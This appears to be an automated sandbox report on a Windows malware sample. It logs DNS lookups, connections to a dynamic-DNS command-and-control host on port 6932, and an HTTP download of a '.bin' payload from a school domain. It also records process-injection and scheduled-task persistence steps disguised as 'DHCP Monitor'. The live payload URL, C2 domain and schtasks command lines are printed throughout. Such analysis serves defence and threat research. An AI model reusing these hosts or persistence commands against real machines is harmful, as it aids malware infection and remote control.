Feb 23, 2021 11:57:30.483153105 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.483161926 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483181000 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.483257055 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.718518972 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718547106 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718609095 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.718625069 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718652010 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.718668938 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.718699932 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718724966 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718744040 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718811035 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718828917 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718878031 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718900919 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718924046 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.718925953 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718949080 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718972921 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.718991995 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719017029 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719017982 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.719043016 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719065905 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719067097 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.719086885 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719095945 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.719139099 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.719228983 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719255924 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719281912 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719301939 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:30.719310045 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:30.719341993 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:31.732240915 CET	80	49741	103.150.60.242	192.168.2.5
Feb 23, 2021 11:57:31.732336998 CET	49741	80	192.168.2.5	103.150.60.242
Feb 23, 2021 11:57:34.409995079 CET	49742	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:57:37.416977882 CET	49742	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:57:44.551551104 CET	49743	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:57:47.636531115 CET	49743	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:57:52.565188885 CET	49744	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:57:55.574692965 CET	49744	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:58:00.590800047 CET	49745	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:58:03.606600046 CET	49745	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:58:08.652992964 CET	49746	6932	192.168.2.5	10.2.118.40
Feb 23, 2021 11:58:11.654103041 CET	49746	6932	192.168.2.5	10.2.118.40

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 11:53:27.402848005 CET	54302	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.451468945 CET	53	54302	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.548495054 CET	53784	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.597136974 CET	53	53784	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.601881981 CET	65307	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.653352976 CET	53	65307	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.753978014 CET	64344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.802653074 CET	53	64344	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.810460091 CET	62060	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.859040022 CET	53	62060	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:27.919210911 CET	61805	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:27.967927933 CET	53	61805	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:30.684515953 CET	54795	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:30.733191013 CET	53	54795	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:30.863934040 CET	49557	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:30.922516108 CET	53	49557	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:31.931307077 CET	61733	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:31.979897976 CET	53	61733	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:33.173508883 CET	65447	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:33.225016117 CET	53	65447	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:34.183844090 CET	52441	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:34.232310057 CET	53	52441	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:37.819720030 CET	62176	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:37.878554106 CET	53	62176	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:54.709980011 CET	59596	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:54.771769047 CET	53	59596	8.8.8.8	192.168.2.5
Feb 23, 2021 11:53:59.117594004 CET	65296	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:53:59.169214964 CET	53	65296	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:00.076630116 CET	63183	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:00.134829998 CET	53	63183	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:03.667221069 CET	60151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:03.718749046 CET	53	60151	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:04.970557928 CET	56969	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:05.023955107 CET	53	56969	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:06.463258028 CET	55161	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:06.523981094 CET	53	55161	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:22.320291996 CET	54757	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:22.371752024 CET	53	54757	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:23.040867090 CET	49992	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:23.091963053 CET	53	49992	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:23.203481913 CET	60075	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:23.252090931 CET	53	60075	8.8.8.8	192.168.2.5
Feb 23, 2021 11:54:41.438749075 CET	55016	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:54:41.487498045 CET	53	55016	8.8.8.8	192.168.2.5
Feb 23, 2021 11:55:27.035197020 CET	64345	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:55:27.083903074 CET	53	64345	8.8.8.8	192.168.2.5
Feb 23, 2021 11:55:45.315054893 CET	57128	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:55:45.373301029 CET	53	57128	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:22.429409981 CET	54791	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:22.497596979 CET	53	54791	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:23.086483002 CET	50463	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:23.146323919 CET	53	50463	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:23.750447035 CET	50394	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:23.807349920 CET	53	50394	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:24.334043980 CET	58530	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:24.415599108 CET	53	58530	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:24.975594044 CET	53813	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:25.034773111 CET	53	53813	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:25.765847921 CET	63732	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:25.823873043 CET	53	63732	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:26.480931997 CET	57344	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:26.539541006 CET	53	57344	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:26.806000948 CET	54450	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:26.876113892 CET	53	54450	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:27.475321054 CET	59261	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:27.524157047 CET	53	59261	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:30.790479898 CET	57151	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:30.894408941 CET	53	57151	8.8.8.8	192.168.2.5
Feb 23, 2021 11:56:32.489547014 CET	59413	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:56:32.541115046 CET	53	59413	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:27.851294994 CET	60516	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:28.869720936 CET	60516	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:29.251405001 CET	53	60516	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:30.237633944 CET	53	60516	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:34.310029030 CET	51649	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:34.393537045 CET	53	51649	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:44.481472969 CET	65086	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:44.550745964 CET	53	65086	8.8.8.8	192.168.2.5
Feb 23, 2021 11:57:52.497247934 CET	56432	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:57:52.563999891 CET	53	56432	8.8.8.8	192.168.2.5
Feb 23, 2021 11:58:00.529602051 CET	52929	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:58:00.589838982 CET	53	52929	8.8.8.8	192.168.2.5
Feb 23, 2021 11:58:08.592498064 CET	64317	53	192.168.2.5	8.8.8.8
Feb 23, 2021 11:58:08.652335882 CET	53	64317	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 23, 2021 11:57:30.237786055 CET	192.168.2.5	8.8.8.8	d006	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 23, 2021 11:57:27.851294994 CET	192.168.2.5	8.8.8.8	0xc660	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:28.869720936 CET	192.168.2.5	8.8.8.8	0xc660	Standard query (0)	mtspsmjeli.sch.id	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:34.310029030 CET	192.168.2.5	8.8.8.8	0x8e87	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:44.481472969 CET	192.168.2.5	8.8.8.8	0x725f	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:52.497247934 CET	192.168.2.5	8.8.8.8	0x9558	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:00.529602051 CET	192.168.2.5	8.8.8.8	0x65e3	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:08.592498064 CET	192.168.2.5	8.8.8.8	0xfaca	Standard query (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 23, 2021 11:57:29.251405001 CET	8.8.8.8	192.168.2.5	0xc660	No error (0)	mtspsmjeli.sch.id	103.150.60.242	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:30.237633944 CET	8.8.8.8	192.168.2.5	0xc660	No error (0)	mtspsmjeli.sch.id	103.150.60.242	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:34.393537045 CET	8.8.8.8	192.168.2.5	0x8e87	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:44.550745964 CET	8.8.8.8	192.168.2.5	0x725f	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:57:52.563999891 CET	8.8.8.8	192.168.2.5	0x9558	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:00.589838982 CET	8.8.8.8	192.168.2.5	0x65e3	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)
Feb 23, 2021 11:58:08.652335882 CET	8.8.8.8	192.168.2.5	0xfaca	No error (0)	ghsgatvxbznmklopwagdhusvxbznxgtewuahjkop.ydns.eu	10.2.118.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mtspsmjeli.sch.id

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49741	103.150.60.242	80	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:57:29.519809961 CET	9436	OUT	GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: mtspsmjeli.sch.id Cache-Control: no-cache
Feb 23, 2021 11:57:29.758059978 CET	9436	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/octet-stream Last-Modified: Wed, 17 Feb 2021 16:04:20 GMT Accept-Ranges: bytes Content-Length: 207936 Date: Tue, 23 Feb 2021 10:57:29 GMT Server: LiteSpeed
Feb 23, 2021 11:57:29.758244038 CET	9438	IN	Data Raw: 23 26 88 c7 8c b6 bb 5f 35 76 d0 11 c7 d5 92 a0 81 0c 07 71 71 78 2f 0d c7 19 bf 1d f2 8a dd f2 91 8c eb 74 a8 45 d1 23 01 77 2c f0 b7 44 95 ac 92 19 a6 85 90 7d df 71 e5 32 cd 65 54 1c 14 8c 7b b0 a5 0f ac a6 a9 c2 d6 5d 45 e4 dc 29 2a d4 30 45 Data Ascii: #&_5vqqx/tE#w,D}q2eT{]E)*0Emk"[9_mQhipJz4,Eq1#J43T2Vzj8{&md`_``2=\|nCHh$UCB<XWwW Q4\|fx:EW
Feb 23, 2021 11:57:29.758263111 CET	9439	IN	Data Raw: f9 b7 2a 53 8e 9b bb 90 29 25 57 01 24 a6 a1 83 13 4d a8 d9 e0 df b1 5a 6c 4b 20 c6 a2 22 d4 94 77 c2 5f 14 18 c0 b0 5a 68 c1 cc 16 42 48 9d 7a 75 14 17 a1 97 2e 56 ac 5c 4c 4b ff 4b ba 62 ff 09 87 da e0 a1 46 45 b1 01 f3 78 8f 36 3b e9 7f a8 1e Data Ascii: S)%W$MZlK "w_ZhBHzu.V\LKKbFEx6;4EWA~arpbyA0KJFe:RYKm4yJ&MKUTrlLt5nL^; -~&/Ix_Cx
Feb 23, 2021 11:57:29.758280039 CET	9441	IN	Data Raw: 2c c6 e2 a6 6e 9e 6b 4b 17 cb c3 27 ed bf 1c a7 46 e4 aa 2a b7 f3 98 aa fc 4f 15 6d 88 13 f2 ac e7 3e c1 eb 8e b7 29 80 7e 15 ab c5 78 96 97 08 8e 41 b6 54 cc ec 5e c1 66 ce 97 11 bd 3f 3b 09 29 50 f1 70 e4 aa d9 7e c8 b4 33 c3 3a 5d cd 20 62 29 Data Ascii: ,nkK'FOm>)~xAT^f?;)Pp~3:] b)XON zMan[:A&%0Ww~O:?W1/_TL3kI]k{*4\|XCCtTCW;d;S$\|t.@f$3=gC5 :h
Feb 23, 2021 11:57:29.758296967 CET	9442	IN	Data Raw: c5 25 c6 73 98 97 d0 3e c4 40 8e fc 5c a6 3a 1a df 53 88 38 6d 0e 4a 5a db de 7c e4 c5 b9 f3 33 7d fa 22 48 8c 24 09 44 93 18 e0 a6 e4 23 c6 79 4d 9c 83 49 24 b8 b8 78 f3 3b 5c 66 a8 ef 6c 0a 01 0d 49 f1 64 17 b4 71 98 a0 a1 49 f7 d0 67 fc 20 f5 Data Ascii: %s>@\:S8mJZ\|3}"H$D#yMI$x;\flIdqIg zQ4uilf3ynq>oQ\vGL6XO<('@pi!/ZCQ6w)g:]P'zY!*YjB({v7_`La6$rK/=-D\aCRv
Feb 23, 2021 11:57:29.758330107 CET	9443	IN	Data Raw: 3a 85 0e ba 73 78 91 04 26 e1 c9 a8 52 53 ae d9 7d 9b 68 06 d4 aa b5 79 41 79 5b df 37 95 69 35 28 09 45 99 e3 90 54 0c 38 8d 84 46 fd 1e 68 32 ca 09 1a a0 13 df bd 1b 13 c7 a8 64 db c6 86 d5 bb 83 88 54 3e 1e bb a5 11 02 d7 d9 a2 8d d6 da 4d 8f Data Ascii: :sx&RS}hyAy[7i5(ET8Fh2dT>Mb1oyA-[6PHB?,ez=t2A~iW6?.#E7K6o_\|9_dQhirniz)E?!) "[khR9S8o1yz
Feb 23, 2021 11:57:29.758378983 CET	9445	IN	Data Raw: 23 5c 86 33 61 5f 71 96 c7 8b 10 b6 f7 0b 88 94 e0 5b c5 c9 2d 63 86 1f 7f c1 eb b4 75 e3 49 d3 14 19 ca d3 43 7a 82 e8 9a 46 49 4e 82 4a e1 4e 4a 81 22 7e 03 04 22 bf aa b0 c4 74 d1 34 ae 8c 6a 35 79 f6 16 24 f6 1b ce 14 33 2a 55 fc 23 96 94 05 Data Ascii: #\3a_q[-cuICzFINJNJ"~"t4j5y$3U#5e.5!MSl(I3tVI2h\?^A8[Ja,L\L5#Ea_Kax%!l($hO`lj=r<t*x7L&YSms:f
Feb 23, 2021 11:57:29.758399010 CET	9446	IN	Data Raw: a3 ea 05 dd a9 4a 43 c4 d9 bb e6 53 75 78 ad 5d bb 83 c4 28 cc 53 ad dd 62 a8 1c a2 4e ed 5f 59 ab a9 94 3e 58 da 28 5a 8d 50 c0 d5 59 1f 46 4c ab 89 76 3e aa 2f 8d 5e 66 b1 65 4c 61 d8 c0 32 ec e0 03 3c cd 5a 8b be dd 4f c6 e8 b2 9f b5 22 28 3f Data Ascii: JCSux](SbN_Y>X(ZPYFLv>/^feLa2<ZO"(?1O`:hw08(v=']jv"E-Y^dpHfGLeI~i_??T'%2bf<8?0_NQE$3$jE.[=
Feb 23, 2021 11:57:29.758719921 CET	9448	IN	Data Raw: 35 09 d1 9d a9 c2 d6 7d 28 c5 f3 c8 02 2b 88 45 1a a1 67 f0 6d f0 de 9a 10 f2 c4 15 ef 7f 22 5f 19 5a fb 4a 08 81 74 6d ca 93 bf 2e be da 6c c1 31 70 ef 13 34 41 0a 82 e2 14 90 94 95 af b3 f1 cb 3f 25 69 1b 29 94 0b a1 97 03 a9 18 e6 ac da 14 e6 Data Ascii: 5}(+Egm"_ZJtm.l1p4A?%i)KLSFJ^W~H?l^R!``h"DS%~C<XW\|yOQ4sRf3y7cHSPZ5L<N%'J^B+M/XS-}c:cmr
Feb 23, 2021 11:57:29.997093916 CET	9449	IN	Data Raw: e0 e0 a1 4c 1e ff 01 e2 5a 6d 3e 13 a7 52 a9 3e 30 6e d9 fd ae 95 1d aa 51 97 e7 63 36 c5 47 1f da 41 99 85 c4 41 d8 2f 5c 91 81 ed 0c 1f 34 6e 32 7b 28 24 b4 2a 14 fb fd 99 8b 4b 4b a4 96 29 31 e8 8b 1c ab b6 8a 89 c9 e4 bc 86 ef 2a 7e 1b 98 ab Data Ascii: LZm>R>0nQc6GAA/\4n2{($KK)1~IR]:^!hy[fMy#\|\;IFFy9~;u 3'<N-KHD&ZWW{jbuj]9]r[l2Y$}<Z#.\|o<%moK."
Feb 23, 2021 11:57:29.997114897 CET	9450	IN	Data Raw: d3 cd ed bb da 72 b6 97 cb 72 12 a2 c7 3a 49 11 8d 51 ff 61 91 41 13 70 91 9d 4d c4 f9 fb fe a9 ef db 80 9a 49 89 66 e4 89 8c c0 12 3b 41 db 2d 0d 88 70 d1 a2 a9 18 6a 8b bb 38 3f db b4 a5 14 b8 11 ad cf 49 41 62 f6 54 4c c0 ae 87 6b 49 5b b0 80 Data Ascii: rr:IQaApMIf;A-pj8?IAbTLkI[k)ZI\XCt{CW6d#UB`(T0#K9T'V)D?\|!K0A6f,v8r?T'pz7Uk)\dK-+9U0GE

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.13077.exe PID: 6184 Parent PID: 5536

General

Start time:	11:53:33
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Imagebase:	0x400000
File size:	106496 bytes
MD5 hash:	532E58083CF5638B05F617FCBBB5D63B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5276 Parent PID: 6184

General

Start time:	11:57:14
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Imagebase:	0x780000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5964 Parent PID: 5276

General

Start time:	11:57:15
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 5464 Parent PID: 5276

General

Start time:	11:57:31
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Imagebase:	0xa20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1000 Parent PID: 5464

General

Start time:	11:57:31
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6536 Parent PID: 5276

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Imagebase:	0xa20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsm.exe PID: 6228 Parent PID: 904

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Imagebase:	0x8c0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6528 Parent PID: 6536

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4572 Parent PID: 6228

General

Start time:	11:57:32
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 1320 Parent PID: 904

General

Start time:	11:57:34
Start date:	23/02/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x2f0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2872 Parent PID: 1320

General

Start time:	11:57:35
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.13077.exe PID: 6184 Parent PID: 5536 SecuriteInfo.com.Variant.Razy.845229.13077.exeCOMMON

Executed Functions

Function 004126A0, Relevance: 118.0, APIs: 60, Strings: 7, Instructions: 780COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004011E6), ref: 004126BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,00000284), ref: 0041273A
__vbaNew2.MSVBVM60(00412044,00416E2C), ref: 0041276C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412034,00000014), ref: 004127D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412054,000000E0), ref: 00412835
__vbaStrMove.MSVBVM60 ref: 00412866
__vbaFreeObj.MSVBVM60 ref: 0041286F
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 0041288F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004128C9
__vbaChkstk.MSVBVM60 ref: 004128EE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412064,000001D0), ref: 00412956
__vbaFreeObj.MSVBVM60 ref: 00412971
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411EB0,000006F8), ref: 004129FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411EB0,000006FC), ref: 00412A4D
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412A7F
